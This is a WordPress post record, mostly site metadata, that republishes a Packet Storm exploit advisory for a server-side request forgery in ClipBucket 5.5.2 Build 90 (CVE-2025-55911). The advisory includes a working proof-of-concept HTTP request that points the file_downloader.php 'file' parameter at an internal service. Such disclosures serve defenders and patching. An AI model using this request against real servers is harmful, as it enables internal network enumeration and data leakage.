{"id":24501,"date":"2025-11-03T11:50:16","date_gmt":"2025-11-03T11:50:16","guid":{"rendered":"http:\/\/localhost\/?p=24501"},"modified":"2025-11-03T11:50:16","modified_gmt":"2025-11-03T11:50:16","slug":"clipbucket-552-build-90-server-side-request-forgery","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=24501","title":{"rendered":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129"},"content":{"rendered":"

{“lastseen”:”2025-11-03T16:53:15″,”description”:”ClipBucket………………………………………”,”published”:”2025-11-03T00:00:00″,”modified”:”2025-11-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:211129″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-55911″],”sourceData”:”# Exploit Title: ClipBucket 5.5.2 Build #90 – Server-Side Request Forgery (SSRF)\\n # Google Dork: N\/A\\n # Date: 2025-09-11\\n # Exploit Author: Mukundsinh Solanki (r00td3str0y3r)\\n # Vendor Homepage: https:\/\/clipbucket.com\\n # Software Link: https:\/\/github.com\/MacWarrior\/clipbucket-v5\\n # Version: 5.5.2 Build #90\\n # Tested on: Ubuntu 20.04 LTS, PHP 7.4\\n # CVE: CVE-2025-55911\\n \\n ## Vulnerability Description:\\n An authenticated user with regular permissions can exploit a Server-Side\\n Request Forgery (SSRF) vulnerability via the `file` parameter in\\n `actions\/file_downloader.php`. By supplying a crafted URL, attackers can\\n force the server to make arbitrary HTTP requests to internal services or\\n external systems. This can lead to internal network enumeration, data\\n exfiltration, or pivoting attacks.\\n \\n ## PoC Request:\\n \\n POST \/upload\/actions\/file_downloader.php HTTP\/1.1\\n Host: victim.com\\n Content-Type: application\/x-www-form-urlencoded\\n Cookie: PHPSESSID=validsession\\n \\n file=http:\/\/127.0.0.1:3306\/test.mp4\\n \\n \\n \\n \\n The server attempts to connect to the internal service (`127.0.0.1:3306`),\\n demonstrating SSRF.\\n \\n ## Impact:\\n – Internal service enumeration\\n – Potential metadata leakage\\n – Pivoting to internal systems\\n \\n \\n Regards,\\n Mukundsinh Solanki\\n +916355251151″,”sourceHref”:”https:\/\/packetstorm.news\/download\/211129″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:L\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/211129\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-11-03T16:53:15″,”description”:”ClipBucket………………………………………”,”published”:”2025-11-03T00:00:00″,”modified”:”2025-11-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:211129″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-55911″],”sourceData”:”# Exploit Title: ClipBucket 5.5.2 Build #90 – Server-Side Request Forgery (SSRF)\\n # Google Dork: N\/A\\n # Date:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-24501","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=24501\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-11-03T16:53:15″,”description”:”ClipBucket………………………………………”,”published”:”2025-11-03T00:00:00″,”modified”:”2025-11-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:211129″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-55911″],”sourceData”:”# Exploit Title: ClipBucket 5.5.2 Build #90 – Server-Side Request Forgery (SSRF)n # Google Dork: N\/An # Date:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=24501\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-03T11:50:16+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24501#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24501\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129\",\"datePublished\":\"2025-11-03T11:50:16+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24501\"},\"wordCount\":317,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-6.5\",\"exploit\",\"MEDIUM\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=24501#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24501\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24501\",\"name\":\"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-03T11:50:16+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24501#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=24501\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=24501#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=24501","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129 - zero redgem","og_description":"{“lastseen”:”2025-11-03T16:53:15″,”description”:”ClipBucket………………………………………”,”published”:”2025-11-03T00:00:00″,”modified”:”2025-11-03T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery”,”source”:””,”references”:””,”id”:”PACKETSTORM:211129″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-55911″],”sourceData”:”# Exploit Title: ClipBucket 5.5.2 Build #90 – Server-Side Request Forgery (SSRF)n # Google Dork: N\/An # Date:...","og_url":"https:\/\/zero.redgem.net\/?p=24501","og_site_name":"zero redgem","article_published_time":"2025-11-03T11:50:16+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=24501#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=24501"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129","datePublished":"2025-11-03T11:50:16+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=24501"},"wordCount":317,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-6.5","exploit","MEDIUM","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=24501#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=24501","url":"https:\/\/zero.redgem.net\/?p=24501","name":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-03T11:50:16+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=24501#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=24501"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=24501#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 ClipBucket 5.5.2 Build 90 Server-Side Request Forgery_PACKETSTORM:211129"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/24501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24501"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/24501\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}